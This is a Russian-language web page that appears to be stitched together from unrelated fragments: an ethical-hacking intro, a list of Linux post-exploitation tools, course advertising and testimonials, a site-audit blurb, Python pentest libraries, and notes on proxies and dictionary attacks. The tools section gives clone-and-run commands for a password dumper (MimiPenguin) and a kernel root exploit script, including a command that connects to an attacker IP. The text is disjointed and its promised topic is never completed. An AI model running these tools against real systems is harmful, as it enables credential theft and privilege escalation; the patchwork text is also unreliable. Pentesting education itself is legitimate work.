7 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Взлом сайта: тактика и инструменты

Взлом сайта: тактика и инструменты

ВЗЛОМ САЙТА . ВВЕДЕНИЕ.

Всем привет, этой статьёй я начинаю серьёзную тему о том, как на самом деле происходит взлом во всех его проявлениях, и если Господь даст сил и терпения, я постараюсь показать, как конкретно воздействуют хакеры на чужой компьютер,приложение и проводят взлом сайта .

Статья будет обрастать ссылками постепенно. Возвращайтесь сюда время от времени.

ЭТИЧЕСКИЕ ХАКЕРЫ И ИХ ЦЕЛЬ

Люди, которые специализируются на этическом процессе взлома, известны как этические хакеры. Это профессионалы, которые взламывают систему или сеть, чтобы найти возможные сбои, подводные камни и уязвимости, которые могут быть использованы хакерами или взломщиками в черной шляпе (Баббар, Джайн и Канг). Умения и мышление этических хакеров равны хакерам со злыми намерениями, но им можно доверять. Этические хакеры сертифицированы и авторизованы для выполнения взлома на целевых системах («Certified Ethical Hacker — CEH Certification | EC-Council»). Этический хакер имеет законное право доступа к личным данным цели и изменения системы цели. Таланты, которыми обладает этический хакер, могут использоваться для ограничения киберпреступности.

Наряду с хакерами в белых и черных шляпах была обнаружена еще одна категория хакеров, которые работают в тесной связи с этическими хакерами, но сталкиваются с некоторыми социальными последствиями. Эти хакеры известны как серые хакеры, которые взламывают технические и сетевые системы по благим причинам, например, помогают организациям решать проблемы безопасности, но не авторизованы (Radziwill et al.). Хакеры «серой шляпы» осуществляют этические взломы, но их несанкционированный подход приводит к отсутствию общественного признания. Этические хакеры нанимаются агентствами, компаниями и организациями для контроля их безопасности.

4 лучших инструмента для взлома Linux.

Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше!

Пост-эксплуатация в практике пен-теста

Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений.

Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации:

получить доступ на выполнение произвольного кодакоманд

изучение данных, хранящихся на сервере

перехват данных, которых нет на системе сейчас, но они могут появиться в будущем

организация перманентного доступа к целевой системе

эскалация привилегий до уровня системы для непривилегированной учетной записи

Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры:

конфигурацию системы (логин и пароль к БД в исходных кодах)

конфигурацию веб-сервера (например, httpd.conf, .htaccess)

исходные коды приложения (поиск уязвимостей, анализируя логику приложения)

доступы к окружению (находясь внутри сети может быть проще попасть на соседние сервера и изолированные сегменты подсети)

базы данных (аутентификационная информация к другим системам, хранящаяся в них)

Обзор инструментов пост-эксплуатации

Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы.

1. PXEenum — полное перечисление всего что есть в системе

Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время.

Для запуска он не требует прав root’а, работает в стандартном терминале.

# git clone https://github.com/shawnduong/PXEnum.git

2. MIDA Multitool — палим систему по взрослому

Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно:

SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д.

Читать еще:  Как выглядят и работают Google дорки ? Простые примеры в сет?

Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев.

Устанавливаем скрипт в систему с github:

# git clone https://github.com/NullArray/Bash-Kit-Multitool

# chmod +x bashkit.sh

Дело сделано! Можно запускать в системе!

3. MimiPenguin — пиздим пароли без зазрения совести

Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей)

Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux.

Устанавливаем MimiPenguin забирая его с репозитория GitHub:

# git clone https://github.com/huntergregal/mimipenguin

# chmod +x mimipenguin.sh

4. LARE — ломимся под рута используя баги ядра

И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8.

Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP.

Устанавливаем скрипт в систему:

# git clone https://github.com/EnigmaDimitri/LARE && cd LARE

Запуск скрипта на целевой машине в сети

# LARE.sh -l [Attackers-IP]

Запуск на машине с подключением к базе данных эксплойтов на GitHub

# LARE.sh -l or ./LARE.sh -l

Проверка и защита системы от техник пост-эксплуатации

Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-day или устаревший софт,

А вот их обзор читай в материале на страницах журнала ][акер!

Заключение

Сегодня мы кратко рассмотрели самые популярные и проверенные в практике пен-теста рабочие инструменты, используемые на фазе пост-эксплуатации для серверов под управлением Linux! Как видишь, нет ничего абсолютно защищенного. Эти знания, я надеюсь, пригодится тебе и на CTF и для пен-теста свойственной корпоративной сети и развития общего понимания практики обеспечения раальной ИБ.

  • Оригинальное название: Этичный хакинг и тестирование на проникновение
  • Номер курса: ЭХТП
  • Вендор: Авторские и иные курсы
  • Профессия: Сетевой администраторАдминистратор почтовых системАдминистратор баз данныхСпециалист по информационной безопасностиСетевой инженерАдминистратор беспроводных сетейИнженер беспроводных сетей
  • Заказать курс

Модуль 1. Введение в этичный хакинг

Модуль 2. Сбор информации

Модуль 3. Сканирование

Модуль 4. Перечисление

Модуль 5. Хакинг системы

Модуль 6. Трояны и другое вредоносное ПО

Модуль 7. Снифферы

Модуль 8. Социальная инженерия

Модуль 9. Отказ в обслуживании

Модуль 10. Хакинг веб-серверов

Модуль 11. Хакинг веб-приложений

Модуль 12. SQL инъекции

Модуль 13. Хакинг беспроводных сетей

Модуль 14. Обход систем обнаружения вторжений, фаерволлов и Honey Pot

Модуль 15. Криптография

Преподаватели: Вячеслав Золотарев, Алексей Шниперов, Артём Пузиков, Константин Михайлов.

Территориальный фонд обязательного медицинского страхования Красноярского края выражает Вам благодарность за предоставленную возможность обучить наших специалистов на курсе повышения квалификации «Этичный хакинг и тестирование ка проникновение». Благодаря высокой квалификации и практическому опыту преподавателей курс раскрывает не только теоретические аспекты обеспечения информационной безопасности, а также дает инструментарий для проведения тестов. Практическая направленность курса делает его особенно ценным. Отдельную благодарность хотим выразить сотрудникам АНО ДПО УЦ «СИБИНФОЦЕНТР» за качественную подготовку и организацию курса.

Преподаватели: Вячеслав Золотарев, Алексей Шниперов, Артём Пузиков, Константин Михайлов.

В ноябре 2016 сотрудники Информационно-технического отдела Дирекции по развитию АО «КБ «Искра» проходили обучение по курсу «Этичный хакинг. Тестирование на проникновение». Несмотря на то, что название курса больше соответствует тематике взлома информационных систем, следует отметить большое количество материалов по предотвращению вторжений в информационные системы предприятия. В ходе практических занятий удалось не только проверить полученные знания на практике, но и провести тестирование информационных ресурсов организации. Хочется отметить высокую квалификацию преподавательского состава и прекрасную организацию процесса обучения. Особая признательность Константину Михайлову за интересные примеры из профессиональной практики. Считаем, что данный курс может быть полезен всем специалистам по информационной безопасности. Желаем успехов в дальнейшем развитии образовательной деятельности!

Читать еще:  Атака брутфор Как предотвратить? Часть 1

Как проходит

Обязательным условием является наличие резервных копий объектов аудита, находящихся вне периметра аудита. Как правило, наиболее оптимальный вариант — разворачивание тестового стенда.

Также, необходим контакт технического специалиста заказчика для прямого взаимодействия во время проведения аудита. Хотя многие компании стараются не ставить в известность о проведении аудита технический персонал, тем не менее, такой контакт крайне необходим — ему сообщаются IP адреса атакующей стороны, аккаунты, с которых проводится исследование. На протяжении всего процесса аудита осуществляется прямое взаимодействие с исполнителем.

По результатам анализа безопасности сайта заказчик получает развернутый отчет по выявленным уязвимостям, вектора и сценарии атак, а также рекомендации по их устранению. В отчете содержится описание модели нарушителя, классификация уязвимостей, методология аудита, указаны примеры атак по выявленным векторам. Язык отчета (русский, английский и т.д.) согласовывается на этапе подписания Договора. Консультирование технической стороны заказчика осуществляется после окончания аудита и получения заказчиком отчета. В сложнореализуемых векторах атаки заказчику может быть представлена видео-запись (скринкаст) реализации вектора атаки.

Подводя итог стоит отметить, что качественный аудит безопасности сайта позволяет обеспечить заказчику услуги безопасность и бесперебойную работу своего ресурса на высоком уровне, минимизировав риски компрометации и сохранить репутацию.

Тест на проникновение

Еще одно важное применение программирования Python в кибербезопасности — это тестирование на проникновение. Тест на проникновение — это попытка взлома веб-сайта, приложения, устройства или сети с целью проверки безопасности этого объекта.

Чтобы выполнять эти тесты эффективно, многие профессионалы создают свои собственные инструменты и скрипты, которые работают именно так, как им нужно для теста, и именно здесь знание Python становится очень полезным.

Python в основном используется в этой области для разработки пользовательских скриптов и инструментов, используемых для выполнения атак. Если вы хотите добиться успеха в этой области, вам будет очень полезно знать, как писать эффективные сценарии, а также как читать и понимать инструменты, написанные другими. Вот некоторые из ключевых библиотек, с которыми вам необходимо ознакомиться.

Python Nmap

Nmap — очень широко используемый сканер портов. Сканирование портов — это процесс проверки того, какие порты открыты на компьютере и какие службы работают на этом компьютере, чтобы вы могли начать определять, насколько этот компьютер может быть уязвим для взлома.

Библиотека Python Nmap упрощает использование функциональных возможностей Nmap с помощью скриптов Python, ускоряя процесс сканирования целевого компьютера на наличие уязвимостей и предоставляя вам больше возможностей для настройки сканирования. Эта библиотека позволяет вам анализировать результаты сканирования Nmap, выполнять пользовательское сканирование и импортировать результаты Nmap в другие инструменты.

Socket

Socket — это библиотека низкоуровневого сетевого взаимодействия, которая позволяет устанавливать соединения клиент-сервер. В контексте кибербезопасности это важно, потому что это позволяет вам подключаться к любой машине на указанном порту с определенным протоколом и отправлять данные на эту машину.

Это можно использовать для сканирования портов машины, а также для отправки данных на машину или извлечения информации с нее. Кража данных происходит на более позднем этапе тестирования на проникновение и называется эксплуатацией. Любой проект, который требует от вас связи через сетевой интерфейс, скорее всего, будет использовать Socket.

Scapy

Scapy — это библиотека управления пакетами, которая может подделывать и декодировать пакеты по множеству различных сетевых протоколов.

В кибербезопасности бывают ситуации, когда вам нужно отслеживать пакеты, отправляемые по компьютерной сети. Это может быть для того, чтобы определить, взломал ли кто-то вашу среду, посмотреть, какие порты и службы работают на машине, или устранить проблему с сетью.

Какой бы ни была причина, эта библиотека отлично подходит для анализа пакетов и может иметь те же функции, что и популярные инструменты, такие как Nmap, Wireshark и tcpdump.

Requests

Requests (запросы) — довольно понятны. Они позволяют программистам отправлять HTTP-запросы через свои скрипты. HTTP-запросы полезны для действий по тестированию на проникновение, позволяя создавать настраиваемые полезные данные и атаковать веб-приложения.

Запросы могут обеспечивать ту же функциональность, что и такой инструмент, как пакет burp, но с большей настройкой для ваших нужд. Исследователи Imperva обнаружили, что Requests была самой популярной библиотекой Python, используемой в веб-атаках, и использовалась в 89% атак на основе Python.

Beautiful Soup

Эта библиотека специализируется на оказании помощи на этапе сбора информации при тестировании на проникновение.

Beautiful Soup позволяет анализировать данные из файлов HTML и XML, что позволяет автоматизировать задачи очистки данных. Сбор данных может быть важен на этапе разведки с открытым исходным кодом в тесте на проникновение, поскольку этот этап посвящен поиску как можно большего количества информации о цели теста.

Читать еще:  Как узнать, что камера следит за вами?

По этой причине вы можете захотеть создать сценарии для автоматизации этого этапа, выполняя поиск в таких местах, как Github, чтобы найти информацию о вашей целевой компании. Эта информация может включать IP-адреса или идентификаторы пользователей и пароли, которые разработчики часто случайно передают в общедоступные репозитории.

Кроме прямого ущерба сайту (обрушение, порно реклама, воровство контента) наличие вируса на сайте хорошо видят все поисковики, основные уж точно видят. И Google и Яндекс в своих алгоритмах имеют антивирусные инструменты. Если при сканировании сайта поисковики обнаруживают опасный или подозрительный код, сайт попадает в «черные списки», что грозит следующим проблемами:

  • Сайт попадает в базу данных опасных ресурсов и вместо страниц сайта, находящихся в поисковой выдаче, вывешивается вывеска: Сайт может нести угрозу вашей безопасности или что-то подобное. Как следствие, многократное падение выдачи, нервы, а иногда и затраты, при поиске и лечении вирусах;
  • Обнаружение вредоносного кода браузерами все тех же поисковиков, это повод заблокировать в браузерах доступ ко всем страницам сайта. Чем не временное обрушение сайта;
  • Довольно часто, взломщики размещают на сайте скрытые черные seo-ссылки, ведущие на ресурсы со спамом в тысячи и десятки тысяч страниц. Поисковики, с недавних пор, перестали «любить» такие компрометирующие ссылки и как следствие, падение в поисковой выдаче, штрафные санкции и попадание под фильтры, а значит, обвальное выпадение из поискового индекса.

Объект воздействия

Когда вредоносный объект установлен на устройство жертвы, дальнейшая атака уже ведется вручную в несколько этапов: изучение, проникновение, закрепление. Например, изучаться могут внутренняя структура сети, подключенные АСУ ТП, системы дистанционного банковского обслуживания, торговые приложения, инженерные разработки и многое другое. Собственно, по цели каждой следующей стадии можно идентифицировать того, кто пытается получить доступ к ценной информации. Поэтому целевые атаки поддаются классификации по объектам воздействия:

  • Атака, нацеленная на кражу денежных средств. Подобным нападениям подвержены банки, компании крупного бизнеса.
  • Финансовая информация. В любой компании есть финансовая система — сервис «клиент-банк», торговая площадка, бухгалтерская база данных. Получив доступ к этой информации или контроль над приложениями, злоумышленники могут ограбить саму компанию или ее клиентов.
  • Производственные секреты. Для воровства производственных секретов обычно необходимо атаковать системы разработки инженерных проектов, то есть приложения класса САПР. Такие атаки обычно выполняются под заказ конкурентов или государственных разведок с целью промышленного шпионажа.
  • Саботаж. Нанесение какого-либо ущерба работоспособности производственных систем АСУ ТП — цель кибертеррористов или кибервойск иностранных государств. Бизнес-модель таких нападений просчитать сложно, поскольку она не выражается в деньгах.
  • Персональные данные. Если модули контроля были установлены злоумышленниками в офисных системах, то целью, скорее всего, являются персональные данные клиентов, сотрудников или партнеров. В частности, утечки сообщений электронной почты можно отнести именно к этому типу атак. Если компания была использована как плацдарм для нападения на партнеров, то также атакуются офисные системы. Конечная цель киберпреступников — продать информацию на черном рынке.
  • Есть примеры целевых атак, когда злоумышленники использовали системы предприятия в своих целях. Например, колумбийский наркокартель взломал АСУ ТП порта, и нужные контейнеры с наркотиками автоматически ставились в определенные места, где их забирали заказчики.

Для того чтобы затруднить хакерам развитие атаки, стоит как минимум сегментировать сеть, выделив и особо защитив зоны с наиболее ценной информацией. Впрочем, можно поставить и несколько ловушек или приманок (ханипотов), чтобы затруднить злоумышленникам изучение внутренней структуры сети.

Взлом сайта . Какое оборудование или инструменты хакеры для этого используют?

Самый первый и основной инструмент хакера – прокси-перехватчик. Почему? Причин несколько. Между собой они не связаны, но представляют собой отличный инструмент в наборе для идеального взлома:

  • Сам по себе прокси-сервер увеличивает скорость доступа к любой странице в сети
  • Конечно, анонимность. Ни один компьютер до прокси-сервера не распознаётся.
  • Фильтрование данных
  • Позволяет просматривать и изменять сообщения обмена между протоколом HTTP и целевой программой.

После того, как мы разобрались с установкой прокси-перехватчика, нам необходимо будет настроить браузер под работу с прокси-сервером.

Взлом сайта первой атакой, которую будет использовать хакер, это естественно, будет проводится атакой по словарю. Атака по словарю – подбор пароля администратора веб-ресурса с помощью словаря, который должен включать в себя максимально большое количество буквенно-цифро-символьных сочетаний. Для этой цели можно использовать готовый словарь, который содержит всевозможные пароли, устанавливаемые по умолчанию, или обычные словные словари. В сети их невообразимое количество и проблем со скачиванием нет.

Следующий этап – настройка прокси на автоматизированный процесс атаки.

Ссылка на основную публикацию
Статьи c упоминанием слов:
Adblock
detector